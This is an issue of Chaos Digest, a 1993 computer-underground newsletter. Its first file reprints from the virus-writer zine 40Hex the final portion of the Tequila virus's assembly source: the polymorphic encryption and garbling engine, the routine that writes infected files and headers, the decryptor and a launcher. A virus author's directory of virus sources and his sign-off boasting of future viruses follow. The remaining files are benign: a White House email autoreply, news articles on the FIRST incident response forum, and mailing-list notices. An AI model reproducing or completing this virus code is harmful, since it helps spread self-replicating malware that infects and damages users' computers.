Chaos Digest Mercredi 2 Juin 1993 Volume 1 : Numero 44 ISSN 1244-4901 Editeur: Jean-Bernard Condat (jbcondat@attmail.com) Archiviste: Yves-Marie Crabbe Co-Redacteurs: Arnaud Bigare, Stephane Briere TABLE DES MATIERES, #1.44 (2 Juin 1993) File 1--40H VMag Issue 1 Volume 4 #012(2)-014 (reprint) File 2--Adresse electronique de Bill Clinton (news) File 3--FIRST, nouveau forum anti-hackers aux USA (lutte) File 4--Liste de diffusion de _The Hack Report_ (abonnement) File 5--Autre type de chaos (identification) Chaos Digest is a weekly electronic journal/newsletter. Subscriptions are available at no cost by sending a message to: linux-activists-request@niksula.hut.fi with a mail header or first line containing the following informations: X-Mn-Admin: join CHAOS_DIGEST The editors may be contacted by voice (+33 1 47874083), fax (+33 1 47877070) or S-mail at: Jean-Bernard Condat, Chaos Computer Club France [CCCF], B.P. 155, 93404 St-Ouen Cedex, France. He is a member of the EICAR and EFF (#1299) groups. Issues of ChaosD can also be found from the ComNet in Luxembourg BBS (+352) 466893. Back issues of ChaosD can be found on the Internet as part of the Computer underground Digest archives. They're accessible using anonymous FTP: * kragar.eff.org [192.88.144.4] in /pub/cud/chaos * uglymouse.css.itd.umich.edu [141.211.182.53] in /pub/CuD/chaos * halcyon.com [192.135.191.2] in /pub/mirror/cud/chaos * ftp.cic.net [192.131.22.2] in /e-serials/alphabetic/c/chaos-digest * cs.ubc.ca [137.82.8.5] in /mirror3/EFF/cud/chaos * ftp.ee.mu.oz.au [128.250.77.2] in /pub/text/CuD/chaos * nic.funet.fi [128.214.6.100] in /pub/doc/cud/chaos * orchid.csv.warwick.ac.uk [137.205.192.5] in /pub/cud/chaos CHAOS DIGEST is an open forum dedicated to sharing French information among computerists and to the presentation and debate of diverse views. ChaosD material may be reprinted for non-profit as long as the source is cited. Some authors do copyright their material, and they should be contacted for reprint permission. Readers are encouraged to submit reasoned articles in French, English or German languages relating to computer culture and telecommunications. Articles are preferred to short responses. Please avoid quoting previous posts unless absolutely necessary. DISCLAIMER: The views represented herein do not necessarily represent the views of the moderators. Chaos Digest contributors assume all responsibility for ensuring that articles submitted do not violate copyright protections. ---------------------------------------------------------------------- Date: Tue May 11 09:24:40 PDT 1993 From: 0005847161@mcimail.com (American_Eagle_Publication_Inc. ) Subject: File 1--40H VMag Issue 1 Volume 4 #012(2)-014 (reprint) [suite du listing du virus Tequila] WRITE_THE_NEW_HEADER: CALL 0696 ;Masm Mod. Needed OUT_OF_ENCRYPT: RET COPY_TO_HIGH_MEMORY_ENCRYPT_WRITE: PUSH BP XOR AH,AH INT 01A MOV AX,DX MOV BP,DX PUSH DS POP ES MOV DI,0960 MOV SI,DI MOV CX,020 CLD REP STOSW XOR DX,DX MOV ES,DX CALL ENCRYPT_STEP_ONE CALL ENCRYPT_STEP_TWO CALL ENCRYPT_STEP_THREE MOV B[SI],0E9 MOV DI,028C SUB DI,SI SUB DI,3 INC SI MOV W[SI],DI MOV AX,0A04 CALL AX POP BP RET ENCRYPT_STEP_ONE: DEC BP ES TEST B[BP],2 ;Masm Mod. Needed JNE 08EB ;Masm Mod. Needed MOV B[SI],0E INC SI CALL GARBLER MOV B[SI],01F INC SI CALL GARBLER RET MOV W[SI],0CB8C INC SI INC SI CALL GARBLER MOV W[SI],0DB8E INC SI INC SI CALL GARBLER RET ENCRYPT_STEP_TWO: AND CH,0FE DEC BP ES TEST B[BP],2 ;Masm Mod. Needed JE 0920 ;Masm Mod. Needed OR CH,1 MOV B[SI],0BE INC SI MOV W[SI],BX INC SI INC SI CALL GARBLER ADD BX,0960 TEST CH,1 JE 0934 ;Masm Mod. Needed MOV B[SI],0BB INC SI MOV W[SI],BX INC SI INC SI CALL GARBLER ADD BX,0960 TEST CH,1 JE 090C ;Masm Mod. Needed SUB BX,0960 CALL GARBLER MOV B[SI],0B9 INC SI MOV AX,0960 MOV W[SI],AX INC SI INC SI CALL GARBLER CALL GARBLER RET ENCRYPT_STEP_THREE: MOV AH,014 MOV DH,017 TEST CH,1 JE 0958 ;Masm Mod. Needed XCHG DH,AH MOV DI,SI MOV AL,08A MOV W[SI],AX INC SI INC SI CALL GARBLER XOR DL,DL MOV B[0A39],028 ;Masm Mod. Needed DEC BP ES TEST B[BP],2 ;Masm Mod. Needed JE 0978 ;Masm Mod. Needed MOV DL,030 MOV B[0A39],DL ;Masm Mod. Needed MOV W[SI],DX INC SI INC SI MOV W[SI],04346 INC SI INC SI CALL GARBLER MOV AX,0FE81 MOV CL,0BE TEST CH,1 JE 0993 ;Masm Mod. Needed MOV AH,0FB MOV CL,0BB MOV W[SI],AX INC SI INC SI PUSH BX ADD BX,040 MOV W[SI],BX INC SI INC SI POP BX MOV B[SI],072 INC SI MOV DX,SI INC SI CALL GARBLER MOV B[SI],CL INC SI MOV W[SI],BX INC SI INC SI MOV AX,SI SUB AX,DX DEC AX MOV BX,DX MOV B[BX],AL CALL GARBLER CALL GARBLER MOV B[SI],0E2 INC SI SUB DI,SI DEC DI MOV AX,DI MOV B[SI],AL INC SI CALL GARBLER RET GARBLER: DEC BP ES TEST B[BP],0F ;Masm Mod. Needed JE RET ;Masm Mod. Needed DEC BP ES MOV AL,B[BP] ;Masm Mod. Needed TEST AL,2 JE 0A0E ;Masm Mod. Needed TEST AL,4 JE 09F7 ;Masm Mod. Needed TEST AL,8 JE 09F1 ;Masm Mod. Needed MOV W[SI],0C789 INC SI INC SI JMP RET ;Masm Mod. Needed MOV B[SI],090 INC SI JMP RET ;Masm Mod. Needed MOV AL,085 DEC BP ES MOV AH,B[BP] ;Masm Mod. Needed TEST AH,2 JE 0A05 ;Masm Mod. Needed DEC AL OR AH,0C0 MOV W[SI],AX INC SI INC SI JMP RET ;Masm Mod. Needed DEC BP ES TEST B[BP],2 ;Masm Mod. Needed JE 0A1A ;Masm Mod. Needed MOV AL,039 JMP 09F9 ;Masm Mod. Needed MOV B[SI],0FC INC SI RET MAKE_THE_DISK_WRITE: CALL PERFORM_ENCRYPTION_DECRYPTION MOV AH,040 MOV BX,W[09A4] MOV DX,0 MOV CX,09A4 PUSHF CALL D[09B4] ;Masm Mod. Needed JB 0A37 ;Masm Mod. Needed SUB AX,CX PUSHF CMP B[0A39],028 ;Masm Mod. Needed JNE 0A44 ;Masm Mod. Needed MOV B[0A39],0 ;Masm Mod. Needed CALL PERFORM_ENCRYPTION_DECRYPTION POPF RET PERFORM_ENCRYPTION_DECRYPTION: MOV BX,0 MOV SI,0960 MOV CX,0960 MOV DL,B[SI] XOR B[BX],DL INC SI INC BX CMP SI,09A0 JB 0A61 ;Masm Mod. Needed MOV SI,0960 LOOP 0A52 ;Masm Mod. Needed RET THE_FILE_DECRYPTING_ROUTINE: PUSH CS POP DS MOV BX,4 MOV SI,0964 MOV CX,0960 MOV DL,B[SI] ADD B[BX],DL INC SI INC BX CMP SI,09A4 JB 0A7E ;Masm Mod. Needed MOV SI,0964 LOOP 0A6F ;Masm Mod. Needed JMP 0390 ;Masm Mod. Needed ;========== THE FOLLOWING IS NOT PART OF THE VIRUS ======== ;========== BUT IS MERELY THE BOOSTER. ======== START: LEA W[0104],EXIT ;Masm Mod. Needed MOV W[0106],CS ;Masm Mod. Needed MOV BX,CS SUB W[0106],BX ;Masm Mod. Needed JMP INSTALL EXIT: INT 020 TEQUILA ENDP CODE_SEG ENDS END TEQUILA +++++ 40Hex Issue 4 December 1991 Left Blank Cause its bad luck how about something real dumb like.... Directory of C:\TASM . 11-28-91 11:44a .. 11-28-91 11:44a LAB 12-10-91 8:45p 1605 ASM 38553 12-09-91 12:31p 911 ASM 19267 12-10-91 7:21p 911 SDF 7084 12-10-91 10:41p BBRAINS ASM 8990 08-06-91 3:04p BMONDAY ASM 21455 12-09-91 12:31p BOBVIRUS ASM 21280 12-14-91 4:38p BRU_TEST COM 11 12-16-91 1:52p CANCER ASM 2600 02-09-91 12:38a DARTH2 ASM 8938 12-09-91 11:50a DEADPOOL ASM 5324 12-14-91 1:00a DIR2SCAN ASM 892 12-22-91 1:17a DIR2SCAN COM 112 12-22-91 1:17a EMFII ASM 16755 12-08-91 10:55p FILES DOC 2373 12-11-91 9:58a FUNNY ASM 5807 12-18-91 12:46p FUNNY COM 208 12-18-91 12:46p GREP DOC 13619 03-13-91 2:02a HAPPY ASM 5667 12-18-91 12:32p HAPPY MAP 34 12-25-91 11:27a HEADER 94 12-09-91 10:25a JOKER ASM 16258 11-10-91 10:55p KILL-FSP ASM 1475 11-12-91 4:28p KILL-FSP COM 55 12-25-91 11:26a KILL-FSP EXE 823 12-25-91 11:26a KILL-FSP MAP 103 12-25-91 11:26a KILL-FSP OBJ 195 12-25-91 11:26a MAKE EXE 37056 03-13-91 2:02a MANUAL DOC 52126 03-13-91 2:02a MBIOS MAC 13380 03-13-91 2:02a MG-1 ASM 4527 12-17-91 10:58a MG-1 SDF 2319 12-17-91 10:58a NAILME ASM 206 12-18-91 10:01p NAILME COM 100 12-19-91 10:26a OBJXREF DOC 18404 03-13-91 2:02a PARITY ASM 5837 12-09-91 12:49p PH-VIR1 TXT 22086 11-04-91 9:00p PROLOG DOC 23811 03-13-91 2:02a RAGE ASM 9335 11-29-91 12:17p SR EXE 117543 10-30-89 8:00a SURVEY DOC 4479 11-29-91 1:01p TASM EXE 106521 03-13-91 2:02a TASM TAH 167927 03-13-91 2:02a TCREF DOC 4954 03-13-91 2:02a TCREF EXE 7856 03-13-91 2:02a TD EXE 409360 03-13-91 2:02a TDCONFIG TD 1208 12-06-91 12:01p TDCONVRT EXE 35366 03-13-91 2:02a TDDEV EXE 8544 03-13-91 2:02a TDHELP TDH 126541 03-13-91 2:02a TDINST EXE 107638 03-13-91 2:02a TDMAP EXE 16944 03-13-91 2:02a TDMEM EXE 14256 12-24-91 8:19p TDNMI COM 644 03-13-91 2:02a TDPACK EXE 25520 03-13-91 2:02a TDREMOTE EXE 20738 03-13-91 2:02a TDRF EXE 17376 03-13-91 2:02a TDSTRIP EXE 13868 03-13-91 2:02a TDUMP EXE 70554 03-13-91 2:02a THELP COM 9912 11-28-91 11:46a THELP DOC 7619 03-13-91 2:02a TINY ASM 4233 01-01-80 12:26a TINY TXT 92 01-01-80 12:25a TINYB ASM 4404 01-01-80 12:32a TINYB TXT 89 01-01-80 12:31a TINYC ASM 4669 01-01-80 12:14a TINYC TXT 118 01-01-80 12:31a TINYD ASM 5486 01-01-80 12:02a TINYE ASM 6464 01-01-80 12:09a TLIB EXE 35668 03-13-91 2:02a TLINK DOC 3837 03-13-91 2:02a TLINK EXE 53510 03-13-91 2:02a TOUCH COM 5118 03-13-91 2:02a UPDATE DOC 20266 03-13-91 2:02a VIENNA ASM 26395 09-30-87 12:59a VIOL-C ASM 19096 12-16-91 10:25p VSAFE COM 32050 03-28-91 1:00p VWATCH COM 12263 03-28-91 1:00p WIN COM 19358 12-24-91 9:52p WINFIX ASM 2603 12-21-91 8:18p WINFIX COM 357 12-24-91 9:52p WINFIX MAP 103 12-24-91 9:52p WINFIX OBJ 553 12-24-91 9:52p 85 file(s) 1939259 bytes Directory of C:\TASM\LAB . 12-10-91 8:45p .. 12-10-91 8:45p LAB 12-10-91 8:46p AMAG0589 TXT 46529 05-21-89 7:06p AMAG1289 TXT 113270 12-16-89 12:21p BIT ASM 778 08-30-91 8:33p BIT MAP 103 12-24-91 11:31p BIT OBJ 192 12-24-91 11:31p BUGOFF ASM 903 12-25-91 11:59a BUGOFF COM 43 12-25-91 11:59a BUGOFF MAP 103 12-25-91 11:59a BUGOFF OBJ 198 12-25-91 11:59a CRACK-W ASM 1430 12-24-91 7:49p CRACK-W MAP 103 12-24-91 7:47p DIR ASM 10274 12-25-91 12:46a DIR MAP 99 12-25-91 12:48a DIR OBJ 961 12-25-91 12:48a DIR SDF 5032 12-25-91 12:46a DL ASM 416 12-14-91 6:35p DUMB DOC 52346 12-19-91 1:46p ENW 3 12-19-91 6:02p EXE_FILE ASM 80 12-24-91 12:36a EXE_FILE EXE 516 12-24-91 12:36a EXE_FILE MAP 220 12-24-91 12:36a EXE_FILE OBJ 183 12-24-91 12:36a FUCK_UP DOC 198 12-23-91 10:33a FUNGUS ASM 17120 12-21-91 1:37p FUNGUS SDF 4933 12-21-91 1:34p HAP ASM 2440 12-16-91 12:42p HAPPY ASM 7144 12-25-91 11:30a HAPPY COM 248 12-25-91 11:28a HAPPY MAP 99 12-25-91 11:28a HAPPY OBJ 424 12-25-91 11:28a HEADER 94 12-09-91 10:25a KENNEDY ASM 6663 12-25-91 12:43a KENNEDY SDF 2803 12-25-91 12:43a KILL ASM 517 12-19-91 6:05p MAR-INST BAT 205 08-31-91 12:13a MAR-INST DOC 1037 08-31-91 12:20a MARAUDER ASM 21997 12-23-91 10:21a MARAUDER DOC 2305 12-20-91 9:40a MAR_ASM! ZIP 5361 12-23-91 10:35a MODES ASM 244 12-25-91 7:22p MODES COM 7 12-25-91 7:22p MODES MAP 99 12-25-91 7:22p MODES OBJ 136 12-25-91 7:22p NEW ASM 21997 12-23-91 10:21a NEW COM 869 12-25-91 12:12a NEW MAP 103 12-25-91 12:12a NEW OBJ 1261 12-25-91 12:12a NEW_KILL ASM 1318 12-23-91 10:29a NEXT ASM 2208 12-25-91 12:41a PS ANS 3218 11-25-91 9:43p SECTOR ASM 1573 12-11-91 10:52p SS DOC 270 08-08-91 3:00p SS EXE 6898 08-08-91 3:00p TARGET ASM 472 12-20-91 3:32p TARGET COM 100 12-25-91 8:53p TARGET MAP 103 12-25-91 8:53p TARGET OBJ 261 12-25-91 8:53p 60 file(s) 348507 bytes Directory of C:\TASM\LAB\LAB . 12-10-91 8:46p .. 12-10-91 8:46p 2 file(s) 0 bytes Total files listed: 147 file(s) 2287766 bytes 1843200 bytes free +++++ 40Hex Issue 4 December 1991 Is This The End? ++++++++++++++++ Well, to be honest. I'm kind of tired writing this magazine. It's not like I hate it or anything, it's just too much pressure for one person to handle. Decimator helped me out a bit with a few articals and such. But still every time I do an issue it's me who does the marjority of the work. It seems the magazine is bigger than I thought. It seems to be on everybodys BBS from NY to California, from Canada to Europe. The thing is I can't write this thing by myself anymore. I work everyday from 2pm - 10pm and I will be going back to school next semester. So I don't have time to handle all the things I do. So in the long run the magazine suffers. Anyway, unless people want to help out (mabey the reason is that I haven't really asked before) lemme know. Contact me on Digital Warefare. The numbers in an artical in this issue somewhere I'm sure. Anyway, fuck it, If people don't contribute soon this may well be the last issue of this rag ever. So whatever happens in 1992, we shall see. So if this is it, later people. My viruses will still be coming on strong as always... Later Hellraiser 12/26/91 ------------------------------ Date: Thu Jun 3 01:48:14 -0400 1993 From: postmaster@whitehouse.gov Subject: File 2--Adresse electronique de Bill Clinton (news) [ChaosD: Voici la reponse recu a un courrier envoye ce matin au President des Etats-Unis sur sa nouvelle messagerie ouverte le premier du mois: President@WhiteHouse.gov.] Thank you for sending in your thoughts and comments to the President via electronic mail. We are pleased to introduce this new form of communication into the White House for the first time in history. I welcome your response and participation. As we work to reinvent government and streamline our processes, this electronic mail experiment will help put us on the leading edge of progress. Please remember, though, this is still very much an experiment. Your message has been read, and we are keeping careful track of all the mail we are receiving electronically. We will be trying out a number of response-based systems shortly, and I ask for your patience as we move forward to integrate electronic mail from the public into the White House. Again, on behalf of the President, thank you for your message and for taking part in the White House electronic mail project. Sincerely, Marsha Scott, Deputy Assistant to the President and Director of Correspondence ------------------------------ Date: May 29, 1993 08:47:48 GMT From: gregory@email.teaser.com (Gregory Noe ) Subject: File 3--FIRST, nouveau forum anti-hackers aux USA (lutte) Copyright: Worldwide Videotex & The Baltimore Sun, 1993 RESPONSE GROUP FORMED TO HANDLE INTERNATIONAL COMPUTER AND NETWORK SECURITY PROBLEMS Mainframe Computing May 00, 1993 V. 6 NO. 5 p. 1 Government and private organizations in North America and Europe are joining forces to help combat and prevent the world's escalating computer and network security problems. Known as the *Forum of Incident Response and Security Teams*, or FIRST, the coalition brings together a variety of computer security incident response teams from the public and private sectors, as well as from universities. FIRST aims to foster cooperation and coordination in incident prevention, to prompt rapid reaction to incidents, and to promote information sharing among its members. FIRST currently includes more than 20 response teams and liaisons (see attached list of participating organizations). Participation in FIRST is voluntary, and member teams must fund their own involvement. One of FIRST's chief goals is to expand the number of participating incident response teams and to foster increased cooperation in incident response-related activities. In general, a response team is set up to serve a defined constituency. In many cases, a team serves a single organization's computer network users. Other teams are operated by computer vendors and deal primarily with their specific operating systems. Incident response teams generally augment an organization's overall computer security efforts by focusing on computer security incidents. The FIRST Secretariat is responsible for various administrative and coordination activities. The National Institute of Standards and Technology serves as the secretariat. "Computer security vulnerabilities associated with information technology, such as malicious abuse or viruses, require a rapid, skilled and coordinated response to minimize damage," said Dennis Steinauer, who oversees NIST's participation in FIRST and chairs the FIRST Steering Committee. "For a response team to be effective, it must have rapid communication both within its own constituency and with other incident response teams. That's what FIRST aims to accomplish." FIRST members, he said, use automatic alerting mechanisms, electronic mail and a number of other methods to achieve this rapid communication. FIRST is working to achieve several goals: * To boost cooperation among information technology users in the effective prevention, detection and recovery from computer security incidents; * To provide a means to alert and advise clients on potential threats and emerging incident situations; * To support and promote the actions and activities of participating incident response teams, including research and operational activities; and * To simplify and encourage the sharing of security-related information, tools and techniques. FIRST membership has grown quickly from 11 original teams to more than 20. Although initial membership consisted primarily of U.S. government organizations, membership of private-sector organizations, universities and non-U.S. organizations is growing. Many are finding that FIRST participation offers extensive information and help in combating and preventing computer security incidents. FIRST officials state, however, that members are expected to participate actively in the forum. The FIRST Secretariat can provide information on establishing an incident response capability and on FIRST membership. For more information, contact: FIRST Secretariat Attn: Dennis Steinauer National Institute of Standards and Technology A216 Technology Building Gaithersburg, MD 20899-0001 Phone: (301)975-3359 Electronic Mail: first-sec@nist.gov. +++++ COMPUTER SECURITY EXPERTS ON THE ALERT BALTIMORE MORNING SUN (BS) - Monday, May 24, 1993 By: Steve Auerweck Staff Writer Edition: Final Section: Financial Page: 12C On Nov. 2, 1988, Robert Morris, a Cornell University graduate student from Arnold, set loose a "worm" that soon disabled thousands of computers on the Internet, an enormous but loose conglomeration of computers nationwide. Not long afterward, a group of computer security experts meeting at the National Security Agency headquarters at Fort Meade to discuss the disaster laid the groundwork for FIRST, the *Forum of Incident Response and Security Teams. FIRST, coordinated out of the National Institute of Standards and Technology offices in Gaithersburg, is a coalition of computer security response teams from both the public and private sectors. Dennis Steinauer, chairman of the FIRST steering committee, describes the need this way: "As more and more organizations get themselves hooked up to networks . . . the threat population has increased, or at least the avenues of exposure." So FIRST now brings together a variety of outfits that might need to respond swiftly to security threats. They range from teams at the Defense Department to US Sprint, the Space Physics Analysis Network in France and the Government Centre for Information Systems in the United Kingdom. The idea is to provide swift communication among members about current or potential problems, such as computer viruses or virulent hackers. "We're not a professional or educational organization," Mr. Steinauer says. "This is an operational activity." Their main avenue of communication is the Internet, but they also learned a lesson in 1988. "We have backup methods in place that we test from time to time," Mr. Steinauer says, "including the telephone." FIRST is contemplating staging "a fairly extensive drill"; it has not yet been challenged by any major incidents. COMPUTER SCIENCES LAB WINS DEFENSE CONTRACT Computer Sciences Corp. learned last week that its Network Security Integration Laboratory, located near Fort Meade, won a $19.9 million, four-year contract to provide information security services to the Defense Department. The laboratory works with the National Computer Security Center, which is affiliated with the NSA. The Anne Arundel lab averages 40 workers, supported by another 60 at CSC's Systems Engineering Division in Falls Church, Va. No new positions are anticipated here. CSC, headquartered in El Segundo, Calif., had received a $6 million contract for the first phase of the project last October. Its security laboratory evaluates encryption devices built for computer networks, telephones, fax machines and the like, and helps users put them to work in specific applications. It also tests security systems and builds mock-ups for Defense Department projects. DIGITAL OFFERS $5,000 TO BREAK V-CARD SYSTEM Digital Enterprises Inc. of Gaithersburg has a challenge for hackers: Break its anti-virus scheme and win $5,000. The company sells a hardware/software protection system called V-Card. If you can beat the machine at its headquarters -- no Trojan horses or bombs allowed, the company says -- you'll win the prize. Enterprising hackers can call Digital at (301) 926-6937. MICROPROSE GAMES HEADED FOR CD FORMATS Hunt Valley's MicroProse Software Inc. has licensed several of its most popular game titles to Capitol Multimedia Inc. for release in two new mass-market compact disk formats. The Washington company will develop, market and distribute the games for CD-I (CD-Interactive) and Sony CD-ROM XA machines. The titles covered by the worldwide pact are Sid Meier's Pirates, Railroad Tycoon and Civilization, as well as Silent Service and Airborne Ranger. WAVERLY TO DISTRIBUTE DAROX VIDEODISCS Waverly Inc.'s Electronic Media Division will be the exclusive distributor of interactive videodiscs put out for nursing schools by Darox Corp. of La Jolla, Calif. Darox now has 32 titles for health professionals, with more being developed. They join other Waverly products for medical instruction, such as the Medi-Sim computer-assisted instruction programs and a line of videos. MAGAZINE SEEKS COMPUTER NIGHTMARES Has your computer driven you right to the edge? Are you ready to hire a disgruntled postal worker to blast the thing to smithereens? Do you long to fold, spindle and mutilate? Put those problems on paper and you may win a restful weekend in California, courtesy of San Diego's ComputorEdge Magazine. Its Computer Dementia Contest seeks a 1,000-word essay on your worst computer nightmare. The most horrid wins a weekend out West. "We have a couple hundred entries so far," said the magazine's Kevin Leap. "Some are pretty hilarious. There was a guy who got Doritos stuck in the keyboard and woke up the next morning with 220,000 pages of the letter 'E.' " Send entries to P.O. Box 83086, San Diego, Calif. 92138. The deadline is July 31. -- *-*-*-*-*-*-*-*-*-*-*-*-*-*- gregory@email.teaser.com - Gregory NOE * ________________________ * PARIS (France) - -*-*-*-*-*-*-*-*-*-*-*-*-*-* ------------------------------ Date: 10 May 1993 03:17:51 GMT From: doug@cc.ysu.edu (Doug Sewell ) Subject: File 4--Liste de diffusion de _The Hack Report_ (abonnement) The Hack Report List [hack@alive.ersys.edmonton.ab.ca] The Hack Report is a monthly informational newsletter put out by Lee Jackson, Co-Moderator of the FidoNet International SHAREWRE echo and Moderator of the FidoNet WARNINGS echo which warns of hacked, hoax, Trojan Hourse, and pirated files that have been seen posted on BBS systems worldwide. It is mainly MS-DOS oriented, although it does have a few notes on programs for other computer platforms. It is a great aid for anyone who downloads files from a public access system. There are many people who do not get quack, or any, access to the latest version of the essential report. This mailing list has been created to allow fast efficient distribution of The Hack Report to people with an Internet mail address who do not have easy access to it via other means such as anonymous FTP or through FidoNet. This is a one-directional list soley for the distribution of The Hack Report each month. To subscribe to The Hack Report mailing list, please send requests to the human monitored address hackalive.ersys.edmonton.ab.ca. Owner: Marc Slemko -- Doug Sewell, Tech Support, Computer Center, Youngstown State University doug@cc.ysu.edu doug@ysub.bitnet !cc.ysu.edu!doug ------------------------------ Date: Mon May 31 23:47:20 -0700 1993 From: park@netcom.com (Bill Park ) Subject: File 5--Autre type de chaos (identification) > that present some security aspects: frauds, hacking, swapping, > legislation, phreaking... Ooops! Sorry, I though the journal was about the nonlinear dynamic systems kind of choas. Never mind, Bill Park ========= ------------------------------ End of Chaos Digest #1.44 ************************************